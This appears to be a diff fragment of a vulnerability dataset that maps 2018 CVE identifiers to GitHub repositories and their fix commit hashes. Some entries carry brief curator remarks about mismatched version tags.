+CVE-2018-7489;https://github.com/FasterXML/jackson-databind;None:None;False;6799f8f10cc78e9af6d443ed6982d00a13f2e7d2,e66c0a9d3c926ff1b63bf586c824ead1d02f2a3d; +CVE-2018-7560;https://github.com/myshenin/aws-lambda-multipart-parser;None:None;False;56ccb03af4dddebc2b2defb348b6558783d5757e; +CVE-2018-7575;https://github.com/tensorflow/tensorflow;None:None;False;32298e892ae8186fba54f58ecbace840ef65f635,2006ef57602012939dc10d7e8961925b320d3ef6,d107fee1e4a9a4462f01564798d345802acc2aef; +CVE-2018-7576;https://github.com/tensorflow/tensorflow;None:None;False;c48431588e7cf8aff61d4c299231e3e925144df8; was 1.6.0:1.7.0 +CVE-2018-7651;https://github.com/zkat/ssri;None:None;False;d0ebcdc22cb5c8f47f89716d08b3518b2485d65d; +CVE-2018-7711;https://github.com/simplesamlphp/saml2;None:None;False;93fef13dea9c46dc238eb59e414d3ae76559d8c4,5d69753a61b4bfb95eed3ea0c3f8cbb4e6e0ad2f,4f6af7f69f29df8555a18b9bb7b646906b45924d; +CVE-2018-7750;https://github.com/paramiko/paramiko;None:None;False;118c0ec84a60e6d6fa0034922f7cb5011d4a07d5,e9dfd854bdaf8af15d7834f7502a0451d217bb8c,fa29bd8446c8eab237f5187d28787727b4610516; +CVE-2018-7753;https://github.com/mozilla/bleach;None:None;False;c5df5789ec3471a31311f42c2d19fc2cf21b35ef; +CVE-2018-8006;https://github.com/apache/activemq;None:None;False;d8c80a98212ee5d73a281483a2f8b3f517465f62,2373aa1320dec90a60d69001adcb0ce856d61d10; +CVE-2018-8008;https://github.com/apache/storm;None:None;False;1117a37b01a1058897a34e11ff5156e465efb692,0fc6b522487c061f89e8cdacf09f722d3f20589a,efad4cca2d7d461f5f8c08a0d7b51fabeb82d0af,f61e5daf299d6c37c7ad65744d02556c94a16a4b; +CVE-2018-8009;https://github.com/apache/hadoop;None:None;False;eaa2b8035b584dfcf7c79a33484eb2dffd3fdb11,11a425d11a329010d0ff8255ecbcd1eb51b642e3,6d7d192e4799b51931e55217e02baec14d49607b,bd98d4e77cf9f7b2f4b1afb4d5e5bad0f6b2fde3,cedc28d4ab2a27ba47e15ab2711218d96ec88d23,65e55097da2bb3f2fbdf9ba1946da25fe58bec98,12258c7cff8d32710fbd8b9088a930e3ce27432e,1373e3d8ad60e4da721a292912cb69243bfdf470,6a4ae6f6eeed1392a4828a5721fa1499f65bdde4,fc4c20fc3469674cb584a4fb98bac7e3c2277c96,e3236a9680709de7a95ffbc11b20e1bdc95a8605,745f203e577bacb35b042206db94615141fa5e6f,45a1c680c276c4501402f7bc4cebcf85a6fbc7f5; +CVE-2018-8013;https://github.com/apache/xmlgraphics-batik;None:None;False;c5e5734293920250f2876648ac93660afc1d2923; +CVE-2018-8014;https://github.com/apache/tomcat;None:None;False;d83a76732e6804739b81d8b2056365307637b42d,5877390a9605f56d9bd6859a54ccbfb16374a78b,60f596a21fd6041335a3a1a4015d4512439cecb5; +CVE-2018-8016;https://github.com/apache/cassandra;None:None;False;28ee665b3c0c9238b61a871064f024d54cddcc79; +CVE-2018-8017;https://github.com/apache/tika;None:None;False;62926cae31a02d4f23d21148435804b96c543cc7,45a1c680c276c4501402f7bc4cebcf85a6fbc7f5; +CVE-2018-8025;https://github.com/apache/hbase;None:None;False;f6c4405929055c7e3d7135f49015dfac707c58d6,5f03fb399c13ff1eebf4067af6dc11cdded1694d,f7e50346322c6ba0ee46e64c07677e9ea052718e,7c1366de453989f115935c1db31d082d6ef3f868,30e98b4455f971c9cb3c02ac7b2daeebe4ee6f2d,bf25c1cb7221178388baaa58f0b16a408e151a69,625d4d002620139f49c8201f95b789b6a715cd41,dbebacbcfcbf66fbddb7e1b4a416c89e39831c5b,0c42acbdf86d08af3003105a26a2201f75f2e2c3; +CVE-2018-8026;https://github.com/apache/lucene-solr;None:None;False;e21d4937e0637c7b7949ac463f331da9a42c07f9,d1baf6ba593561f39e2da0a71a8440797005b55c,3aa6086ed99fa7158d423dc7c33dae6da466b093,e5407c5a9710247e5f728aae36224a245a51f0b1,1880d4824e6c5f98170b9a00aad1d437ee2aa12b; fixed version is vulnerable +CVE-2018-8027;https://github.com/apache/camel;None:None;False;24eefa559fe6b310629d2bf00663d2679ec81b96,3fe03e361725b66c1c3eaa40bb11577fb3dc17b3,8467d644813a62f3a836c0c7dee8cf5a41de3c07; +CVE-2018-8030;https://github.com/apache/qpid-broker-j;None:None;False;881323e56620ea069d52885842652a6fbf3403c0,025b48f3193e2b10b1c41d2bc3bcfc9cfc238a27; +CVE-2018-8031;https://github.com/apache/tomee;None:None;False;b8bbf50c23ce97dd64f3a5d77f78f84e47579863; +CVE-2018-8037;https://github.com/apache/tomcat;None:None;False;ed4b9d791f9470e4c3de691dd0153a9ce431701b,ccf2e6bf5205561ad18c2300153e9173ec509d73; was 9.0.9:9.0.10 +CVE-2018-8038;https://github.com/apache/cxf-fediz;None:None;False;4c396acb42439e61cc63b0452dd22442d720b61b,b6ed9865d0614332fa419fe4b6d0fe81bc2e660d; +CVE-2018-8039;https://github.com/apache/cxf;None:None;False;8ed6208f987ff72e4c4d2cf8a6b1ec9b27575d4b,fae6fabf9bd7647f5e9cb68897a7d72b545b741b; +CVE-2018-8088;https://github.com/qos-ch/slf4j;None:None;False;d2b27fba88e983f921558da27fc29b5f5d269405,c15d3c1dab0c3398011dec3a16ad3e45b75ae70d,918a055bdf87867f69693cf82727fa435c489e25; tracer commit misses the good one +CVE-2018-8097;https://github.com/pyeve/eve;None:None;False;57c320b925164dbc579355b0a06affa903f2ca1f,f8f7019ffdf9b4e05faf95e1f04e204aa4c91f98; +CVE-2018-8128;https://github.com/chakra-core/ChakraCore;None:None;False;23848b1272067625ab50115c6f30a0b177c633ba; +CVE-2018-8177;https://github.com/chakra-core/ChakraCore;None:None;False;eb4b00bcd61a56d5ac66f4155870cba3178d3273; +CVE-2018-8178;https://github.com/chakra-core/ChakraCore;None:None;False;c8f723d99c484c3a31df2187cdd2893ac27506a3; +CVE-2018-8315;https://github.com/Microsoft/ChakraCore;None:None;False;e03b3e30160ac5846b246931634962ce6bd1db83; +CVE-2018-8359;https://github.com/chakra-core/ChakraCore;None:None;False;f8bdb180c4e9351f441e25dc818815d0c63af753; +CVE-2018-8381;https://github.com/chakra-core/ChakraCore;None:None;False;1b77d559416116f9719febb7dee3354150277588; +CVE-2018-8390;https://github.com/chakra-core/ChakraCore;None:None;False;63ae30a750a4a0b2a2eb61a35dd3d2fc10104a90; +CVE-2018-8416;https://github.com/dotnet/corefx;None:None;False;dabb4f5dc837550dc6835a7be9a6db8b8fd5fdc7,85b40be5e2df53df1b667442c0717242266d7b3f,c50af3eee993880dc31877dd596356639b2ee1f0,a0fcd23ace1c8d692988cd0da4391cf7bf5e0ce6; vulnerable tag is fixed +CVE-2018-8465;https://github.com/chakra-core/ChakraCore;None:None;False;7e235c914df50f4bb42efad55a7527350a7cc7ae; +CVE-2018-8473;https://github.com/Microsoft/ChakraCore;None:None;False;a27864395a53f0ebe27a71a004265c28383a4385; +CVE-2018-8510;https://github.com/chakra-core/ChakraCore;None:None;False;9b36ce832c9a81bb51e3b1a39067feadcd1e14d2; +CVE-2018-8541;https://github.com/chakra-core/ChakraCore;None:None;False;3bee8f018e15c803d87d8b2981d0522f6d58ecac; +CVE-2018-8899;https://github.com/IdentityServer/IdentityServer4;None:None;False;ce8a487521f87b8593bfb0cab14d7ebaed42079b,21d0da227f50ac102de469a13bc5a15d2cc0f895; +CVE-2018-9109;https://github.com/Studio-42/elFinder;None:None;False;157f471d7e48f190f74e66eb5bc73360b5352fd3; +CVE-2018-9110;https://github.com/Studio-42/elFinder;None:None;False;e6351557b86cc10a7651253d2d2aff7f6b918f8e; +CVE-2018-9206;https://github.com/blueimp/jQuery-File-Upload;None:None;False;aeb47e51c67df8a504b7726595576c1c66b5dc2f; +CVE-2018-9856;https://github.com/Kotti/Kotti;None:None;False;00b56681fa9fb8587869a5e00dcd56503081d3b9,69d3c8a5d7203ddaec5ced5901acf87baddd76be; +CVE-2018-10055;https://github.com/tensorflow/tensorflow;None:None;False;111e04aed22fdeed494580dae127720326c1b8ee,3c1d5bc91be37396c73060bf123ead784741c6ef,3a279f15fde94882c27670dee313ce501cba92b9,c89ab82a82585cdaa90bf4911980e9e845909e78; +CVE-2018-10092;https://github.com/Dolibarr/dolibarr;None:None;False;5d121b2d3ae2a95abebc9dc31e4782cbc61a1f39; +CVE-2018-10094;https://github.com/Dolibarr/dolibarr;None:None;False;7ade4e37f24d6859987bb9f6232f604325633fdd; +CVE-2018-10095;https://github.com/Dolibarr/dolibarr;None:None;False;1dc466e1fb687cfe647de4af891720419823ed56; +CVE-2018-10188;https://github.com/phpmyadmin/phpmyadmin;None:None;False;c6dd6b56e236a3aff953cee4135ecaa67130e641; +CVE-2018-10237;https://github.com/google/guava;None:None;False;7ec8718f1e6e2814dabaa4b9f96b6b33a813101c,f89ece5721b2f637fe754937ff1f3c86d80bb196; +CVE-2018-10366;https://github.com/rainlab/user-plugin;None:None;False;098c2bc907443d67e9e18645f850e3de42941d20; +CVE-2018-10862;https://github.com/wildfly/wildfly-core;None:None;False;77ea76eb5651ed1daf40a681a990bb65018d9535,40996ae6d5d3b6c1602a15f96b86a8d8a39b53eb; +CVE-2018-10903;https://github.com/pyca/cryptography;None:None;False;d4378e42937b56f473ddade2667f919ce32208cb; +CVE-2018-10912;https://github.com/keycloak/keycloak;None:None;False;40d129cf541e85e8d0d04a990be6e7954a0a5d2b,c64ecb1ab84e66fcb486423c1978d3b83852e8d2; +CVE-2018-10936;https://github.com/pgjdbc/pgjdbc;None:None;False;cdeeaca47dc3bc6f727c79a582c9e4123099526e; +CVE-2018-11039;https://github.com/spring-projects/spring-framework;None:None;False;dac97f1b7dac3e70ff603fb6fc9f205b95dd6b01,f2694a8ed93f1f63f87ce45d0bb638478b426acd,323ccf99e575343f63d56e229c25c35c170b7ec1; +CVE-2018-11040;https://github.com/spring-projects/spring-framework;None:None;False;b80c13b722bb207ddf43f53a007ee3ddc1dd2e26,874859493bbda59739c38c7e52eb3625f247b93a; +CVE-2018-11087;https://github.com/spring-projects/spring-amqp;None:None;False;444b74e95bb299af5e23ebf006fbb45d574fb95e,d64e7fa3993dac577c0973e0caf8c31d27ef5e44; +CVE-2018-11093;https://github.com/ckeditor/ckeditor5-link;None:None;False;8cb782eceba10fc481e4021cb5d25b2a85d1b04e; +CVE-2018-11248;https://github.com/lingochamp/FileDownloader;None:None;False;e8dd7724c9243b21181eb3d27a1715ed811ccfde,ff240b883490a84744705f9b4165719d7633f902,b023cc081bbecdd2a9f3549a3ae5c12a9647ed7f; +CVE-2018-11307;https://github.com/FasterXML/jackson-databind;None:None;False;27b4defc270454dea6842bd9279f17387eceb737,051bd5e447fbc9539e12a4fe90eb989dba0c656e,78e78738d69adcb59fdac9fc12d9053ce8809f3d; +CVE-2018-11627;https://github.com/sinatra/sinatra;None:None;False;12786867d6faaceaec62c7c2cb5b0e2dc074d71a,3742bddcee8eb5afd69cf51327c1716c506e1adc; +CVE-2018-11647;https://github.com/jaredhanson/oauth2orize-fprm;None:None;False;2bf9faee787eb004abbdfb6f4cc2fb06653defd5,d48b4dd0e5a25ee2094725d98c35e468f027afd8; +CVE-2018-11758;https://github.com/apache/cayenne;None:None;False;6fc896b65ed871be33dcf453cde924bf73cf83db,8d4c83abed024fc3a698148a122429022b89b590; +CVE-2018-11761;https://github.com/apache/tika;None:None;False;4e67928412ad56333d400f3728ecdb59d07d9d63,148adec1016acc122fa5e972f75d7029376998d9,bd9d75d8b0a85af2937047bfad04288c3044b2a6; +CVE-2018-11762;https://github.com/apache/tika;None:None;False;a09d853dbed712f644e274b497cce254f3189d57,c0fb57d9d20e8eb7cb77bce8742e4566a18f5db8; +CVE-2018-11771;https://github.com/apache/commons-compress;None:None;False;a41ce6892cb0590b2e658704434ac0dbcb6834c8; +CVE-2018-11775;https://github.com/apache/activemq;None:None;False;02971a40e281713a8397d3a1809c164b594abfbb,1e31df9800fc2db258f2458628bd9863c11b2846,69fad2a135689f6c31fbada1c397f2e0dfd90d3c,bde7097fb8173cf871827df7811b3865679b963d; +CVE-2018-11777;https://github.com/apache/hive;None:None;False;f0419dfaabe31dd7802c37aeebab101265907e1a,00c0ee7bc4b8492476b377a6edafcc33411f14b6,1a1d6ca1bc3ae840238dc345fa1eb2c7c28c8cb0; +CVE-2018-11784;https://github.com/apache/tomcat;None:None;False;efb860b3ff8ebcf606199b8d0d432f76898040da; +CVE-2018-11786;https://github.com/apache/karaf;None:None;False;103f33105a58c899706a0687bb334678e2fa1ee7,24fb477ea886e8f294dedbad98d2a2c4cb2a44f9; +CVE-2018-11787;https://github.com/apache/karaf;None:None;False;cfa213ad680ded70b70bf0c648891a06386ef632,434e52502528e91e20d2f87cec7732f1e6e554c2,1fc60d7792e1aa35970b8d967f88ca3381053172; +CVE-2018-11788;https://github.com/apache/karaf;None:None;False;cc3332e97fa53a579312894d08e383f321a96aed,0c36c50bc158739c8fc8543122a6740c54adafca; +CVE-2018-11797;https://github.com/apache/pdfbox;None:None;False;ea7d321b6e23cf017437846bcee4de19784cf6c8,bb5defd088bebd566d126df079d35b356ba0534a,2db39c139d935a8ba03e1ae3c012d2d41dd6912a; +CVE-2018-11798;https://github.com/apache/thrift;None:None;False;2a2b72f6c8aef200ecee4984f011e06052288ff2; +CVE-2018-11804;https://github.com/apache/spark;None:None;False;c21d7e1bb958a0cfa4cba34a688d594466088c9e,ac586bbb016d70c60b1bd2ea5320fd56c3a8eead,8906696ac2089f3d6500b0496af7d9995c7de99b,d7a35877b96dce8b742acf77e79bda189e402ae2; commits do not have tags,wrong versions, only 2.x.y are affected according to spark advisory +CVE-2018-12022;https://github.com/FasterXML/jackson-databind;None:None;False;7487cf7eb14be2f65a1eb108e8629c07ef45e0a1,28badf7ef60ac3e7ef151cd8e8ec010b8479226a; +CVE-2018-12023;https://github.com/FasterXML/jackson-databind;None:None;False;7487cf7eb14be2f65a1eb108e8629c07ef45e0a1,28badf7ef60ac3e7ef151cd8e8ec010b8479226a; +CVE-2018-12043;https://github.com/symphonycms/symphonycms;None:None;False;1ace6b31867cc83267b3550686271c9c65ac3ec0; +CVE-2018-12418;https://github.com/junrar/junrar;None:None;False;ad8d0ba8e155630da8a1215cee3f253e0af45817; +CVE-2018-12537;https://github.com/eclipse-vertx/vert.x;None:None;False;3a6512695a9d610687081eb13d2a1681151fd7fb,1bb6445226c39a95e7d07ce3caaf56828e8aab72; +CVE-2018-12540;https://github.com/vert-x3/vertx-web;None:None;False;f42b193b15a29b772fc576b2d0f2497e7474a7e9,98891b1d9e022b467a3e4674aca4d1889849b1d5; +CVE-2018-12541;https://github.com/eclipse-vertx/vert.x;None:None;False;269a583330695d1418a4f5578f7169350b2e1332; +CVE-2018-12544;https://github.com/vert-x3/vertx-web;None:None;False;ea0b0930fbc122b7114935cafa379facc9611587,3fcb0036dc11f22ea232f61cfff31b29a6b6eca4,26db16c7b32e655b489d1a71605f9a785f788e41,ac8692c618d6180a9bc012a2ac8dbec821b1a973,d814d22ade14bafec47c4447a4ba9bff090f05e8; +CVE-2018-12557;https://github.com/openstack-infra/zuul;None:None;False;ffe7278c08e6e36bf8b18f732c764e00ff51551e; +CVE-2018-12608;https://github.com/moby/moby;None:None;False;ddd5278b07b1c2b12b906244153fd9340e0d7910,190c6e8cf8b893874a33d83f78307f1bed0bfbcd; +CVE-2018-12615;https://github.com/phusion/passenger;None:None;False;4e97fdb86d0a0141ec9a052c6e691fcd07bb45c8; +CVE-2018-12976;https://github.com/golang/gddo;None:None;False;daffe1f90ec57f8ed69464f9094753fc6452e983; +CVE-2018-13447;https://github.com/Dolibarr/dolibarr;None:None;False;36402c22eef49d60edd73a2f312f8e28fe0bd1cb; +CVE-2018-13448;https://github.com/Dolibarr/dolibarr;None:None;False;36402c22eef49d60edd73a2f312f8e28fe0bd1cb; +CVE-2018-13449;https://github.com/Dolibarr/dolibarr;None:None;False;36402c22eef49d60edd73a2f312f8e28fe0bd1cb; +CVE-2018-13450;https://github.com/Dolibarr/dolibarr;None:None;False;36402c22eef49d60edd73a2f312f8e28fe0bd1cb; +CVE-2018-13790;https://github.com/concretecms/concretecms;None:None;False;dc742c1ec83b992cd02d70ae19ee190bbed0b3e8; +CVE-2018-13797;https://github.com/scravy/node-macaddress;None:None;False;358fd594adb196a86b94ac9c691f69fe5dad2332; +CVE-2018-13818;https://github.com/twigphp/Twig;None:None;False;eddb97148ad779f27e670e1e3f19fb323aedafeb; +CVE-2018-13863;https://github.com/mongodb/js-bson;None:None;False;511ecc487ea57f554a0d199206a58efbc9cd121c,bd61c45157c53a1698ff23770160cf4783e9ea4a; +CVE-2018-14040;https://github.com/twbs/bootstrap;None:None;False;2a5ba23ce8f041f3548317acc992ed8a736b609d,149096016f70fd815540d62c0989fd99cdc809e0; +CVE-2018-14041;https://github.com/twbs/bootstrap;None:None;False;cc61edfa8af7b5ec9d4888c59bf94377e499b78b; +CVE-2018-14042;https://github.com/twbs/bootstrap;None:None;False;2d90d369bbc2bd2647620246c55cec8c4705e3d0; +CVE-2018-14371;https://github.com/eclipse-ee4j/mojarra;None:None;False;475c71e282d695fbbb1946a75e267d1b8d9d7503,1b434748d9239f42eae8aa7d37d7a0930c061e24; +CVE-2018-14574;https://github.com/django/django;None:None;False;a656a681272f8f3734b6eb38e9a88aa0d91806f1,d6eaee092709aad477a9894598496c6deec532ff,c4e5ff7fdb5fce447675e90291fd33fddd052b3c,6fffc3c6d420e44f4029d5643f38d00a39b08525; +CVE-2018-14635;https://github.com/openstack/neutron;None:None;False;13631ff187b6c2c6eec4f356a917288560dc5886,54aa6e81cb17b33ce4d5d469cc11dec2869c762d,8287d7f546e4ffe7a2ac32df50d6b465484f81cc,988eceac27a9ad91775376b3b3fedf84963663a5,c1d2f13495b2eb925be6495840795ead5929fd0e,773c5595b5c79b216d37787fd2ba5a989d48868a; +CVE-2018-14637;https://github.com/keycloak/keycloak;None:None;False;0fe0b875d63cce3d2855d85d25bb8757bce13eb1; +CVE-2018-14642;https://github.com/undertow-io/undertow;None:None;False;dc22648efe16968242df5d793e3418afafcb36c0,c46b7b49c5a561731c84a76ee52244369af1af8a; +CVE-2018-14718;https://github.com/FasterXML/jackson-databind;None:None;False;87d29af25e82a249ea15858e2d4ecbf64091db44; +CVE-2018-14719;https://github.com/FasterXML/jackson-databind;None:None;False;87d29af25e82a249ea15858e2d4ecbf64091db44; +CVE-2018-14720;https://github.com/FasterXML/jackson-databind;None:None;False;87d29af25e82a249ea15858e2d4ecbf64091db44; +CVE-2018-14721;https://github.com/FasterXML/jackson-databind;None:None;False;87d29af25e82a249ea15858e2d4ecbf64091db44; +CVE-2018-14731;https://github.com/parcel-bundler/parcel;None:None;False;066e0bf6bd26b15c78bd47df023452e4b20073e4,92b5c0830662f8baebc6fd4eadfd5ddd3de963a3; +CVE-2018-14732;https://github.com/webpack/webpack-dev-server;None:None;False;f18e5adf123221a1015be63e1ca2491ca45b8d10,b3217ca8dc6b371a160b6749b949ab09d7b9f6d7,c42d0da513ac6ee0b48a17b0f6b7830da7c9c2c9; +CVE-2018-14774;https://github.com/symfony/symfony;None:None;False;9cfcaba0bf71f87683510b5f47ebaac5f5d6a5ba,08a32d44b62275b3c6499493dd95e099c84daf60,0f7667d6430eb6529d84a29d7aa83991d1ac4fd0,67044af83d61cfef81349c7add4ade5369acf339,96504fb8c9f91204727d2930eb837473ce154956,1db2d2eda82c8bc031ccd9b85326c0860e5899a2,7f912bbb78377c2ea331b3da28363435fbd91337,974240e178bb01d734bf1df1ad5c3beba6a2f982,bcf5897bb1a99d4acae8bf7b73e81bfdeaac0922,725dee4cd8b4ccd52e335ae4b4522242cea9bd4a; +CVE-2018-14840;https://github.com/intelliants/subrion;None:None;False;b12e287d3814c0f2d0b1892f95fc0190972d2ba5; +CVE-2018-15178;https://github.com/gogs/gogs;None:None;False;1f247cf8139cb483276cd8dd06385a800ce9d4b2; +CVE-2018-15531;https://github.com/javamelody/javamelody;None:None;False;ef111822562d0b9365bd3e671a75b65bd0613353; +CVE-2018-15727;https://github.com/grafana/grafana;None:None;False;df83bf10a225811927644bdf6265fa80bdea9137,7baecf0d0deae0d865e45cf03e082bc0db3f28c3,92ed1f04afcdead02fe3a8bf53caecc89db1c5dc; +CVE-2018-15756;https://github.com/spring-projects/spring-framework;None:None;False;423aa28ed584b4ff6e5bad218c09beef5e91951e,044772641d12b9281185f6cf50f8485b8747132c,c8e320019ffe7298fc4cbeeb194b2bfd6389b6d9; +CVE-2018-15758;https://github.com/spring-projects/spring-security-oauth;None:None;False;ddd65cd9417ae1e4a69e4193a622300db38e2ef1,4082ec7ae3d39198a47b5c803ccb20dacefb0b09,f92223afc71687bd3156298054903f50aa71fbf9; +CVE-2018-16329;https://github.com/ImageMagick/ImageMagick;None:None;False;2c75f301d9ac84f91071393b02d8c88c8341c91c; +CVE-2018-16459;https://github.com/exceljs/exceljs;None:None;False;9066cd89a9fad055166b53ce9e75a42e7636bac1; +CVE-2018-16462;https://github.com/vincentmorneau/apex-publish-static-files;None:None;False;2209af8f2b65c24aa55ab757e0e05b958c16f063; +CVE-2018-16468;https://github.com/flavorjones/loofah;None:None;False;71e4b5434fbcb2ad87643f0c9fecfc3a847943c4,be0fd3ac0fad452730f10e318fa31706257fd081; +CVE-2018-16470;https://github.com/rack/rack;None:None;False;37c1160b2360074d20858792f23a7eb3afeabebd; +CVE-2018-16471;https://github.com/rack/rack;None:None;False;97ca63d87d88b4088fb1995b14103d4fe6a5e594,313dd6a05a5924ed6c82072299c53fed09e39ae7,e5d58031b766e49687157b45edab1b8457d972bd; +CVE-2018-16472;https://github.com/ashaffer/cached-path-relative;None:None;False;a43cffec84ed0e9eceecb43b534b6937a8028fc0; +CVE-2018-16485;https://github.com/nunnly/m-server;None:None;False;01f13f040d1961ca3146dce7e2db990156e65e9a; tag-to-version gets the wrong next tag it should stay empty. The commit has no tag +CVE-2018-16490;https://github.com/aheckmann/mpath;None:None;False;fe732eb05adebe29d1d741bdf3981afbae8ea94d; +CVE-2018-16492;https://github.com/justmoon/node-extend;None:None;False;0e68e71d93507fcc391e398bc84abd0666b28190; +CVE-2018-16733;https://github.com/ethereum/go-ethereum;None:None;False;106d196ec4a6451efedc60ab15957f231fa85639,ecca49e078ace5f867cccdf5c291e3e84dc19982; +CVE-2018-16837;https://github.com/ansible/ansible;None:None;False;a0aa53d1a1d6075a7ae98ace138712ee6cb45ae4,b618339c321c387230d3ea523e80ad47af3de5cf,f50cc0b8cb399bb7b7c1ad23b94c9404f0cc6d23,77928e6c3a2ad878b20312ce5d74d9d7741e0df0; version retrieved from redhat otherwise there were none in the NVD +CVE-2018-16859;https://github.com/ansible/ansible;None:None;False;0d746b4198abf84290a093b83cf02b4203d73d9f,4d748d34f9392aa469da00a85c8e2d5fe6cec52b,2f8d3fcf41107efafc14d51ab6e14531ca8f8c87,8c1f701e6e9df29fe991f98265e2dd76acca4b8c; vulnerable tag is fixed +CVE-2018-16876;https://github.com/ansible/ansible;None:None;False;0954942dfdc563f80fd3e388f550aa165ec931da,424c68f15ad9f532d73e5afed33ff477f54281a7,e0a81d133ffc8f7067182c53cf6a28c724dd1099,ba4c2ebeac9ee801bfedff05f504c71da0dd2bc2; +CVE-2018-16886;https://github.com/etcd-io/etcd;None:None;False;c7f744d6d373e91cc300cd73de9d00b6166f36f1,a2b420c3642a3e4dfefccf3a2ef5b57906206ed9,bf9d0d8291dc71ecbfb2690612954e1a298154b2; +CVE-2018-16984;https://github.com/django/django;None:None;False;bf39978a53f117ca02e9a0c78b76664a41a54745,c4bd5b597e0aa2432e4c867b86650f18af117851; +CVE-2018-17057;https://github.com/tecnickcom/TCPDF;None:None;False;ac6e92fccc7d9383dfd787056831349621b1aca2,1861e33fe05f653b67d070f7c106463e7a5c26ed; +CVE-2018-17104;https://github.com/microweber/microweber;None:None;False;982ea9d5efb7d2306a05644ebc3469dadb33767e; +CVE-2018-17175;https://github.com/marshmallow-code/marshmallow;None:None;False;d5d9cb22dda6f39117f6f9497a6a66813cb8c64f,98f2b4759c9a7c7ac5e790727d47f2b328520713; +CVE-2018-17184;https://github.com/apache/syncope;None:None;False;73aed0a741b1255f45893e3cada6501473350738,36fb466afd64894170fa5e2e030ce6895120b1af,b25a8834db2cc7ea45707a1218e85e0475684270; +CVE-2018-17187;https://github.com/apache/qpid-proton-j;None:None;False;0cb8ca03cec42120dcfc434561592d89a89a805e; +CVE-2018-17193;https://github.com/apache/nifi;None:None;False;e62aa0252dfcf34dff0c3a9c51265b1d0f9dfc9f; +CVE-2018-17194;https://github.com/apache/nifi;None:None;False;748cf745628dab20b7e71f12b5dcfe6ed0bbf134; +CVE-2018-17195;https://github.com/apache/nifi;None:None;False;246c090526143943557b15868db6e8fe3fb30cf6; +CVE-2018-17197;https://github.com/apache/tika;None:None;False;0c49c851979163334ea05cbebdd11ff87feba62d; +CVE-2018-17246;https://github.com/elastic/kibana;None:None;False;9b78cfd4b971df4852c77306e062ef0ccbf2186c,51aff7d3c49724fcbaba4353dff0cd7c3be799b0,22ba11eb525a2045d43307177081047f8a7a3dab,bc6a68529fc72b704b11871bfb11a51bdc724cbf; +CVE-2018-17419;https://github.com/miekg/dns;None:None;False;501e858f679edecd4a38a86317ce50271014a80d; my bad, wrong pick and they were inverted +CVE-2018-18074;https://github.com/psf/requests;None:None;False;3331e2aecdbf575dd60abef4df79c52d78610a83,c45d7c49ea75133e52ab22a8e9e13173938e36ff; +CVE-2018-18206;https://github.com/Bytom/bytom;None:None;False;a79fbcb71c138a499166c802d9f6af5c2ea18253,1ac3c8ac4f2b1e1df9675228290bda6b9586ba42; +CVE-2018-18389;https://github.com/neo4j/neo4j;None:None;False;46de5d01ae2741ffe04c36270fc62c6d490f65c9; +CVE-2018-18476;https://github.com/nedap/mysql-binuuid-rails;None:None;False;9ae920951b46ff0163b16c55d744e89acb1036d4; +CVE-2018-18854;https://github.com/spray/spray-json;None:None;False;855b35e6d65079085d580ab3063637d94c8f3e0a,c8e106fe41dad3916d54dcbf90e3aa5599d4d461; +CVE-2018-18893;https://github.com/HubSpot/jinjava;None:None;False;4f28830ef9883e2c4e2a92a0d37b93c8620de2f7,c13927db0fb7bb3b567469f125be8000f8cbf601; +CVE-2018-18926;https://github.com/go-gitea/gitea;None:None;False;aeb5655c25053bdcd7eee94ea37df88468374162,582213a858d936b4a55ad2416fd0615e78edc247,84829fba82741b5a0a882a9f1e95ea3651fc3ae7; vulnerable tag is fixed +CVE-2018-19048;https://github.com/mycolorway/simditor;None:None;False;ef01a643cbb7f8163535d6bfb71135f80ec6a6fd; +CVE-2018-19133;https://github.com/flarum/core;None:None;False;0536b208e1c31d5c9911d231413f2d1a66683f70,e99f7fcdace74211bec5627e6adf20ddf7dad2a7; +CVE-2018-19184;https://github.com/ethereum/go-ethereum;None:None;False;83e2761c3a13524bd5d6597ac08994488cf872ef; vulnerable tag is fixed +CVE-2018-19351;https://github.com/jupyter/notebook;None:None;False;4026ef01077d2e313a22b371fae2705196b8161d,107a89fce5f413fb5728c1c5d2c7788e1fb17491; +CVE-2018-19352;https://github.com/jupyter/notebook;None:None;False;288b73e1edbf527740e273fcc69b889460871648,ad25be985c55f66ef2105f712cb915708d568e29; +CVE-2018-19360;https://github.com/FasterXML/jackson-databind;None:None;False;42912cac4753f3f718ece875e4d486f8264c2f2b; +CVE-2018-19361;https://github.com/FasterXML/jackson-databind;None:None;False;42912cac4753f3f718ece875e4d486f8264c2f2b; +CVE-2018-19362;https://github.com/FasterXML/jackson-databind;None:None;False;42912cac4753f3f718ece875e4d486f8264c2f2b; +CVE-2018-19370;https://github.com/Yoast/wordpress-seo;None:None;False;3bfa70a143f5ea3ee1934f3a1703bb5caf139ffa,3bc687351bc9a8c9c8c6bb8dbf048184075240a3; +CVE-2018-19620;https://github.com/star7th/showdoc;None:None;False;bcdb5e3519285bdf81e618b3c9b90d22bc49e13c,7e9f06c2f0cbbae55b0cfa0797fe2b4aae562443; +CVE-2018-19787;https://github.com/lxml/lxml;None:None;False;6be1d081b49c97cfd7b3fbd934a193b668629109; +CVE-2018-19992;https://github.com/Dolibarr/dolibarr;None:None;False;0f06e39d23636bd1e4039ac61a743c79725c798b; +CVE-2018-19993;https://github.com/Dolibarr/dolibarr;None:None;False;fc3fcc5455d9a610b85723e89e8be43a41ad1378; +CVE-2018-19994;https://github.com/Dolibarr/dolibarr;None:None;False;850b939ffd2c7a4443649331b923d5e0da2d6446; +CVE-2018-20000;https://github.com/Bedework/bw-webdav;None:None;False;ccb87c2757bab531c53faf0637ee342a378caa7f,cd51e67093ef7f01003878a44f31bc0b2a0d73d1,67283fb8b9609acdb1a8d2e7fefe195b4a261062; +CVE-2018-20028;https://github.com/contao/contao;None:None;False;bbe5fe1d385cd1195670e2d6b972272133443c59; +CVE-2018-20059;https://github.com/pippo-java/pippo;None:None;False;9f36e5891c0b11f840e1e1561ae96d83ba9ce759; +CVE-2018-20094;https://github.com/xuxueli/xxl-conf;None:None;False;e9ea78ccacd06539f75c083c47b3419cf985a8c0,7fa384e507b7eaa5821003211107e243e0d2b49c; +CVE-2018-20227;https://github.com/eclipse/rdf4j;None:None;False;099482e52f070a3d74e5ad368cff59c91e9b4f8a,df15a4d7a8f2789c043b27c9eafe1b30316cfa79; +CVE-2018-20433;https://github.com/swaldman/c3p0;None:None;False;7dfdda63f42759a5ec9b63d725b7412f74adb3e1; +CVE-2018-20594;https://github.com/hs-web/hsweb-framework;None:None;False;b72a2275ed21240296c6539bae1049c56abb542f; 